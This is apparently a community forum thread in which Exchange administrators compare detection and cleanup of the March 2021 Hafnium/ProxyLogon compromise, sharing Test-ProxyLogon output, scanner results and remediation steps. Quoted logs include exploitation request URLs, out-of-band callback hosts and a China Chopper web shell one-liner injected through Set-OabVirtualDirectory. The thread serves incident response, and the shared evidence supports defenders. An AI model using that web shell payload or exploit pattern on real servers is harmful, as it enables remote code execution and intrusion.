Hafnium - Removal of Changes

Occasional Contributor

Server was patched ASAP on Wednesday but may have been to late

Running the Test-ProxyLogon.ps1 from github gave these results :

-------- -------------
2021-03-05T17:31:05.591Z ServerInfo~a]@abc.com:444/autodiscover/autodiscover.xml?#
2021-03-05T17:31:06.253Z ServerInfo~a]@abc.com:444/mapi/emsmdb/?#
2021-03-05T17:31:07.191Z ServerInfo~a]@abc.com:444/ecp/proxyLogon.ecp?#
2021-03-05T17:31:08.897Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:31:10.073Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:31:10.649Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:31:11.840Z ServerInfo~a]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kS6TL5K8jEWXeZB_EwP7c5reesqO4dgIsz19Ysvh9gN1vYSPsWr9YkI2O9Vg75u-
2021-03-05T17:32:04.431Z ServerInfo~akak]@abc.com:444/autodiscover/autodiscover.xml?#
2021-03-05T17:32:05.011Z ServerInfo~akak]@abc.com:444/mapi/emsmdb/?#
2021-03-06T09:31:03.147Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-06T09:49:40.224Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-06T15:31:51.918Z ServerInfo~akak]@abc.com:444/autodiscover/autodiscover.xml?#
2021-03-06T15:31:52.930Z ServerInfo~akak]@abc.com:444/mapi/emsmdb/?#
2021-03-06T15:31:54.373Z ServerInfo~akak]@abc.com:444/ecp/proxyLogon.ecp?#
2021-03-06T15:31:57.070Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwHwB
2021-03-06T15:31:58.447Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwH
2021-03-06T15:31:59.473Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwH
2021-03-06T15:32:41.780Z ServerInfo~akak]@abc.com:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=3SH8QypNaUmWrWtVdN6tSKJSek1H4tgIIz2GzuQ_7nAC2R1lZ3Cq8BaDI7GwH
2021-03-07T01:23:03.269Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-07T02:28:15.385Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-07T10:41:00.728Z ServerInfo~localhost/owa/auth/logon.aspx?
2021-03-06T09:31:03.242Z ServerInfo~localhost/ecp/default.flt?
2021-03-06T09:31:03.800Z ServerInfo~<no value>.82a595b7c3182062c44a.d.requestbin.net/ecp/default.flt?
2021-03-06T09:49:40.225Z ServerInfo~localhost/ecp/default.flt?
2021-03-06T19:29:03.303Z ServerInfo~burpcollaborator.net/ecp/default.flt?
2021-03-07T01:23:03.353Z ServerInfo~localhost/ecp/default.flt?
2021-03-07T02:28:15.386Z ServerInfo~localhost/ecp/default.flt?
2021-03-07T10:41:00.730Z ServerInfo~localhost/ecp/default.flt?

 

Out A/V is up to date and a full scan with that product and additional product showed no infections

 

How do I clean up and of the IIS / autodiscover changes  ?

 

Steve

18 Replies

@sbabcock61 

 

How did you get on with this? I'm considering building a new server and migrating the mailboxes....

It looks like we never got any web shells installed

The MS list of suspected .aspx files were not found

Also no zip/7z files in program data

and ran a number of scanners to see if any payloads had been dropped

 

We're monitoring traffic to and from the server to unknown devices

this is a good resource from FireEye : https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft...

 

and Microsoft : https://github.com/microsoft/CSS-Exchange/tree/eda4b387f8cd0f471496b89f0ab7b4ca642db2fd/Security

 

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log

 

MS need to publish a more detailed document on detecting and removing the various pieces,

The Test-ProxyLogon.ps1 and other scripts from MS are ok but could provide more information

@sbabcock61 

 

I think I'm in the same boat as you. No webshells, no suspicious aspx files and no 7z files. 

 

Firstly I ran Test-ProxyLogon.ps1 and it found evidence of CVE-2021-26855 & CVE-2021-27065.

Then I ran BackendCookieMitigation.ps1 (already done the URL Rewrite a little while ago but this does a bit more so let it do it's thing).

 

I also ran the Microsoft Safety Scanner and it found evidence of Exploit:ASP/CVE-2021-27065.B!dha, it said it removed it and needed a reboot. I'm currently nearly 2hrs through a second pass and it hasn't found anything so far.

 

What other scanners did you run? Thanks for the heads up on the FireEye link, I'll give that a read. We have CrowdStrike Falcon installed on all machines and I was hoping it would have caught it in time. Seems like it didn't quite get there. I patched this Exchange 2019 server last Wednesday, when Microsoft sent out the emails warning us to fix it or face the consequences. Seems like my suspicious activity happened on 03/03/2021, meaning I patched it the day it happened.

we ran Test-ProxyLogon.ps1 and installed BackendCookieMitigation.ps1
We also ran SEP and a standalone Sophos scan along with Stinger64 to check for additional packages
Also checked for .aspx and alterations to iisstart and web.config
We have no files in the asp_client folder in inetpub
Also checked the SharedWebConfig.config file in C:\Program Files\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\ as it's referenced in web.config

Where do you find the Microsoft Safety Scanner ?
Its here - https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-down...

I'll take a look at those two scanners, thanks.

So from an organisational point of view, what do you think will be your next steps? I am fairly confident that as I patched the day of the release and the fact that the logs display 04:42am 03/03/2021 - 20:30 03/03/2021 (which is when the server went offline for CU9 installation) that I caught it before too much happened.
My SharedWebConfig.config file was last modified 02:04am 04/03/2021, nothing looks untoward and I was patching around this time. What did you look for specifically?
Same - was checking references to other files elsewhere - ran file comparison software to see what was different if anything in config files, etc
Have you searched in your ECPServer log files? I have 5 entries around changing the OABVirtualDirectory to something -

S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/&lt;script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""Ananas""],""unsafe"");}&lt;/script&gt;'

The 'f' directory does not exist within wwwroot, neither do any scripts.

I also have a similar entry, 4 of them -

'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/&lt;script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""klk123456""],""unsafe"");}&lt;/script&gt;'

Same here, I started going the IIS to see if anything was strange while I wait for the Safety Scanner to finish. @WarsT86 

I found this link
https://www.spectx.com/articles/investigate-your-logs-for-the-microsoft-exchange-vulnerability
Includes an msi app to look at the logs with various integrated scripts to check things out
This looks really useful, I'm going to get onto it now.

Does your C:\Windows\Temp folder have IIS_USERS with special permissions added??
Traverse Folder/Execute File
Create Files/Write Data
Create Folders/Append Data

IIS_Users has no members and I have no unusual looking local users on the server either...
Looks like I only have List Folder / Read data under Special Permissions / Advanced Permissions

Just special permission to read/list folders, no write access at all.  IIS_IUSRS is a built in group.  @WarsT86 

If it helps, these are the results from MS Safety Scanner, log file is located at %SYSTEMROOT%\debug\msert.log

It turns out I did have some unsavoury files...

Threat detected: Exploit:ASP/CVE-2021-27065.B!dha
file://C:\inetpub\wwwroot\aspnet_client\discover.aspx
SigSeq: 0x0000E9E793147CAE
SHA1: 8114cbe58622421bda6c56713d9ac0245c69e897
Threat detected: Backdoor:MSIL/Chopper.F!dha
file://C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\App_Web_usjyfoyu.dll
SigSeq: 0x00011540CBC0F3F1
SHA1: 10d3dd10796a9814c85cbe4c18af6c37b723a8a3

Extended Scan Removal Results
----------------
Start 'remove' for file://\\?\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\App_Web_usjyfoyu.dll
Operation was scheduled to be completed after next reboot.

Start 'remove' for file://\\?\C:\inetpub\wwwroot\aspnet_client\discover.aspx
Operation succeeded !


Results Summary:
----------------
For cleaning Backdoor:MSIL/Chopper.F!dha, the system needs to be restarted.
Found Exploit:ASP/CVE-2021-27065.B!dha and Removed!
Microsoft Safety Scanner Finished On Mon Mar 08 11:32:33 2021


Return code: 10 (0xa)

@WarsT86 

Mine finished and it was clean.  Guess I dodged the bullet...  Ran a few other scripts that I found on GitHub.  Looks like it was attempted but nothing stuck.  The HTTP proxy logs just record the attempt if I understand, correct?

 

I had just locked down everything on our firewall after our migration a month back and put on the latest Malwarebytes and another AV.

@tomservo 

 

Looks like you have been really lucky. I'm in the process of migrating all the remaining mailboxes to o365 (something we were going to do anyway, 39 left) and building a brand new server at the same time as we are hybrid and still need a physical box. Looking into going fully hosted next, one less thing for me to worry about.

 

The only port I have open to the world on the compromised server is 443, everything else runs through Mimecast, I thought we would be in a much better position than most, I guess I was wrong, despite patching as soon as the bulletin was released. You can't win them all I guess!

 

@sbabcock61 

I don't know if you got this resolved. Had a similar issue and this link solved this.

 

https://techcommunity.microsoft.com/t5/exchange/autodiscover-infected-with-virus/m-p/2232795

 

Best regards,

 

Wikus